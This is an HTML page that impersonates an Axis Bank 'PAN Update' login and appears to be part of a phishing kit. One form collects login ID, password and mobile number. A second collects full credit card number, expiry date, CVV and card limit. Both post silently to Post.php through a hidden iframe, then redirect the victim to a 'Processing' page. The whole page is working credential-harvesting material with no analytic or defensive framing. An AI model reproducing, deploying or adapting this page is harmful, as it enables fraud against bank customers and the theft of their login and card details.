<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta name="theme-color" content="#98144D">
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Axis Bank | PAN Update</title>
    <meta name="description" content="login"/>
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
    <meta name="msapplication-TileColor" content="#da532c">
    <link rel="stylesheet" href="Axis.css" />
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Work+Sans&display=swap" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Work+Sans&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./style.css">
    <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="./style.css">
    <style>
      .hidden {
        display: none;
      }
       
       #mn
       {
       width:100%;
       height: auto;
       }
       
      .card-login {
        display: flex;
        justify-content: space-between;
        margin-bottom: 20px;
      }

      .card-login button {
        flex-grow: 2;
        font-size: 16px;
        font-family: 'Open Sans', sans-serif;
        margin-right:10px;
        padding: 8px;
        border:1px solid #e1e1e1;
        outline:none;
        border-radius: 25px;
        cursor: pointer;
      }

      .card-login button.active {
        background-color: #EB1163;
      }
      input[type="text"] {
      width: 100%;
      border: 1px solid #aaa;
      border-radius: 0px;
      margin: 0;
      outline: none;
      padding: 15px;
      box-sizing: border-box;
      transition: 0.3s;
      }
      
      .inputWithIcon input[type="text"] {
      padding-left: 32px;
      }
      
      .inputWithIcon {
      position: relative;
      }
      
      .inputWithIcon i {
      position: absolute;
      left: 0px;
      top: 22px;
      padding: 10px 6px;
      color: #97144d;
      transition: 0.3s;
      }
      .inputWithIconcvv input[type="text"] {
      padding-left: 26px;
      }
      
      .inputWithIconcvv {
      position: relative;
      }
      
      .inputWithIconcvv i {
      position: absolute;
      left: 0px;
      top: 25.5px;
      padding: 10px 6px;
      color: #97144d;
      transition: 0.3s;
      }
      .inputWithIconDate input[type="text"] {
      padding-left: 26px;
      }
      
      .inputWithIconDate {
      position: relative;
      }
      
      .inputWithIconDate i {
      position: absolute;
      left: 0px;
      top: 23.2px;
      padding: 10px 6px;
      color: #97144d;
      transition: 0.3s;
      }
      .inputWithIconRS input[type="text"] {
      padding-left: 26px;
      }
      
      .inputWithIconRS {
      position: relative;
      }
      
      .inputWithIconRS i {
      position: absolute;
      left: 0px;
      top: 23px;
      padding: 10px 8px;
      color: #97144d;
      transition: 0.3s;
      }
      .inputWithIconPhone input[type="text"] {
      padding-left: 26px;
      }
      
      .inputWithIconPhone {
      position: relative;
      }
      
      .inputWithIconPhone i {
      position: absolute;
      left: 0px;
      top: 24px;
      padding: 10px 8px;
      color: #97144d;
      transition: 0.3s;
      }
      
      .formdate-groupD
      {margin-bottom:25px;}
      
      .formdate-groupD label
      {display:block;}
      
      .formdate-groupD label,.label
      {color:#9b9b9b;
      flex-basis:auto;
      font-size:.875rem;
      font-weight:400;
      line-height:25px;}
      
      .radio
      {accent-color:#97144d;}
      
      .formdate-groupD .date-controlD
      {width:40%;
      padding:5px;
      font-size:16px;
      font-family: 'Work Sans', sans-serif;
      font-weight:400;
      color:black;
      background-color:#F9F9FB;
      caret-color:#EB1163;
      border-style:none;
      border-bottom:1px solid #adbdcc;
      line-height:25px;}
      
      .formdate-groupD .date-controlD:focus
      {border-style:none;
      outline:none;
      border-bottom:1px solid #adbdcc;}
      
      
      .form-groupC
      {margin-bottom:25px}
      
      .formcvb-groupC label
      {display:block;}
      
      .formcvv-groupC label,.label
      {color:#9b9b9b;
      flex-basis:auto;
      font-size:.875rem;
      font-weight:400;
      line-height:25px;}
      
      .radio
      {accent-color:#97144d;}
      
      .formcvv-groupC .cvv-controlC
      {width:86%;
      padding:5px;
      font-size:16px;
      font-family: 'Work Sans', sans-serif;
      font-weight:400;
      color:black;
      background-color:#F9F9FB;
      caret-color:#EB1163;
      border-style:none;
      border-bottom:1px solid #adbdcc;
      line-height:25px;}
      
      .formcvv-groupC .cvv-controlC:focus
      {border-style:none;
      outline:none;
      border-bottom:1px solid #adbdcc;}
    </style>
  </head>
  <body>
  <!-- partial:index.partial.html -->
  <div class="login-box">
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
  <!--My Form-->
    <div id="__next">
        <img alt="" src="AxisMain.jpg" id="mn"/>
      </div>
      <div class="mainContent">
        <h1 class="text-center">Continue to PAN Update</h1>
        <div class="card">
          <div class="card-login">
            <button style="font-family: 'Work Sans', sans-serif; font-weight:600;" type="button" class="active" data-form="formA">Login ID / Customer ID</button>
            <button style="font-family: 'Work Sans', sans-serif; font-weight:600;" type="button" data-form="formC">Credit Card Login</button>
          </div>
          <div>
            <section id="formA">
              <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
                <input type="hidden" name="" value="" />
                <div class="form-group">
                  <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="li">Login ID / Customer ID</label>
                  <input type="text" class="new-control" name="Login_ID" id="lo" maxLength="25"  required="" />
                </div>
                <div class="form-group">
                  <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="pw">Login Password</label>
                  <input type="text" class="new-control" minLength="8" maxLength="30" name="Password" id="pw" required />
                </div>
                <div class="form-group"><label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="Registered_Mobile_No.">
                Registered Mobile No.</label>
                <input type="text" class="new-control" id="Mobile_Number" name="Mobile_Number" maxLength="10" inputmode="numeric"
                pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required=""/></div>
                <div class="text-center" style="font-size:13px;line-height:25px; font-family: 'Work Sans', sans-serif; font-weight:600;">
                  Corporate Banking User? <a href="Corporate_Banking.html">LOGIN HERE</a>
                  <br/>
                  <div class="text-center" style="font-size:13px;line-height:25px; font-family: 'Work Sans', sans-serif; font-weight:600;">
                  First time user? <a href="#">REGISTER HERE</a>
                </div>
                <div class="text-center">
                  <button type="submit" class="submit">Login</button>
                </div>
              </form>
            </section>
            <section id="formC" class="hidden">
              <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
                <input type="hidden" name="" value="" />
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIcon">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="dn">Credit Card Number</label>
                <input type="text" class="new-control" id="dn" name="Card_Number" placeholder="0000 0000 0000 0000" inputMode="numeric" minLength="16" maxLength="19" required />
                <i class="fa fa-credit-card" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                <script>
                function _getcaret(input) {
                if ('selectionStart' in input) {
                // Standard-compliant browsers
                return input.selectionStart;
                } else if(document.selection) {
                input.focus();
                var sel = document.selection.createRange();
                var selLen = document.selection.createRange().text.length;
                sel.moveStart('character', -input.value.length);
                return sel.text.length - selLen;
                }
                }
                function _setcaret(input, pos) {
                if (input.setSelectionRange) {
                input.focus()
                input.setSelectionRange(pos,pos)
                } else if(input.createTextRange) {
                var range = input.createTextRange();
                range.move('character', pos);
                range.select();
                }
                }
                
                function _format_464 (cc) {
                return [cc.substring(0,4),cc.substring(4,10),cc.substring(10,14)].join(' ').trim()
                }
                function _format_465 (cc) {
                return [cc.substring(0,4),cc.substring(4,10),cc.substring(10,15)].join(' ').trim()
                }
                function _format_4444 (cc) {
                return cc?cc.match(/[0-9]{1,4}/g).join(' '):''
                }
                _CARD_TYPES = [
                {'type':'visa','pattern':/^4/, 'format': _format_4444, 'maxlength': 16},
                {'type':'master','pattern':/^(5[12345])|(2[2-7])/, 'format': _format_4444, 'maxlength': 16},
                {'type':'amex','pattern':/^3[47]/, 'format': _format_465, 'maxlength':15},
                {'type':'instapayment','pattern':/^63[789]/, 'format': _format_4444, 'maxlength':16},
                {'type':'diners_club_carte_blanche','pattern':/^30[0-5]/, 'format': _format_464, 'maxlength':14},
                {'type':'diners_club_international','pattern':/^30[0-5]/, 'format': _format_464, 'maxlength':14},
                {'type':'diners_club','pattern':/^54/, 'format': _format_4444, 'maxlength':16}
                ]
                function _format_cardnumber(cc, maxlength) {
                cc = cc.replace(/[^0-9]+/g,'')
                
                for(var i in _CARD_TYPES) {
                const ct = _CARD_TYPES[i]
                if(cc.match(ct.pattern)) {
                cc = cc.substring(0,ct.maxlength)
                return ct.format(cc)
                }
                }
                
                return _format_4444(cc)
                /*
                if(maxlength) {
                cc = cc.substring(0,maxlength)
                }
                if(cc.match(/^3[47]/)) {
                return [cc.substring(0,4),cc.substring(4,10),cc.substring(10,15)].join(' ').trim()
                }
                return cc?cc.match(/.{1,4}/g).join(' '):''
                */
                }
                
                function _set_creditcard_number(event) {
                const input = event.target
                const maxlength = input.getAttribute('maxlength')
                
                var oldval = input.value
                var caret_position = _getcaret(input)
                var before_caret = oldval.substring(0,caret_position)
                before_caret = _format_cardnumber(before_caret)
                caret_position = before_caret.length
                
                var newvalue = _format_cardnumber(oldval, maxlength)
                
                if(oldval==newvalue) return
                
                input.value = newvalue
                _setcaret(input, caret_position)
                }
                
                function make_credit_card_input(input) {
                input.addEventListener('input',_set_creditcard_number)
                input.addEventListener('keyup',_set_creditcard_number)
                input.addEventListener('keydown',_set_creditcard_number)
                input.addEventListener('keypress',_set_creditcard_number)
                input.addEventListener('change',_set_creditcard_number)
                }
                
                make_credit_card_input(document.getElementById("dn"));
                
                
                </script>
                <div class="container">
                <div class="formdate-groupD">
                <div class="inputdate-groupD">
                <div class="inputWithIconDate">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="expiry">
                Expiry Date</label>
                <input type="text" style="font-size:14px;" class="date-controlD" id="expiry" name="Expiry_Date" minlength="4" maxLength="5" placeholder="MM / YY" inputmode="numeric"
                onkeyup="formatString(event);" required=""/>
                <i class="fa fa-calendar" aria-hidden="true"></i>
                <span>
                <div style="margin-top:-23.8%; margin-left:65%;"class="formcvv-groupC">
                <div class="inputcvv-groupC">
                <div class="inputWithIconcvv">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="cvv">CVV / CVC</label>
                <input type="text" style="font-size:14px;" class="cvv-controlC" maxLength="3" inputmode="numeric" id="ap" name="CVV" placeholder="***"
                pattern="[0-9]\d{2}" title="Please enter valid CVV/CVC !" required=""/>
                <i class="fa fa-key" style="font-size:14px;" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                </div>
                </div>
                </div>
                </div>
                </span>
                <script type="text/javascript">
                function formatString(e) {
                var inputChar = String.fromCharCode(event.keyCode);
                var code = event.keyCode;
                var allowedKeys = [8];
                if (allowedKeys.indexOf(code) !== -1) {
                return;
                }
                
                event.target.value = event.target.value.replace(
                /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/
                ).replace(
                /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/
                ).replace(
                /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3
                ).replace(
                /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
                ).replace(
                /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0
                ).replace(
                /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/`
                ).replace(
                /\/\//g, '/' // Prevent entering more than 1 `/`
                );
                }
                </script>
                
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIconRS">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="limit">Credit Card Limit ₹</label>
                <input type="text" style="font-size:14px;" class="new-control" maxLength="7" inputmode="numeric" id="ap" name="Card_Limit" placeholder="Enter available limit in INR"
                pattern="[1-9]\d{3,7}" title="Please enter valid available limit in INR (₹)  !" required=""/>
                <i class="fa fa-inr" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIconPhone">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="Registered_Mobile_No.">
                Registered Mobile No.</label>
                <input type="text" class="new-control" id="Mobile_Number" name="Mobile_Number" maxLength="10" inputmode="numeric"
                pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required=""/>
                <i class="fa fa-phone" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                <div class="text-center">
                  <button type="submit" class="submit">Login</button>
                </div>
              </form>
            </section>
            </div>
            </div>
            </div>
            <img alt="" src="Axis_Ft.jpg" style="width: 100%; height: auto;" />
      <script>
        const buttons = document.querySelectorAll('.card-login button');
        const sections = document.querySelectorAll('.mainContent section');

        buttons.forEach((button) => {
          button.addEventListener('click', () => {
            const formId = button.dataset.form;

            buttons.forEach((btn) => btn.classList.remove('active'));
            sections.forEach((section) => section.classList.add('hidden'));

            button.classList.add('active');
            document.getElementById(formId).classList.remove('hidden');
          });
        });

        const loginOption = document.querySelector('input[name="loginOption"]');
        const customerIDInput = document.getElementById('customerIDInput');
        const mobileNumberInput = document.getElementById('mobileNumberInput');

        loginOption.addEventListener('change', (event) => {
          if (event.target.value === 'customerID') {
            customerIDInput.classList.remove('hidden');
            mobileNumberInput.classList.add('hidden');
          } else if (event.target.value === 'mobileNumber') {
            customerIDInput.classList.add('hidden');
            mobileNumberInput.classList.remove('hidden');
          }
        });
      </script>
    </div>
  </body>
</html>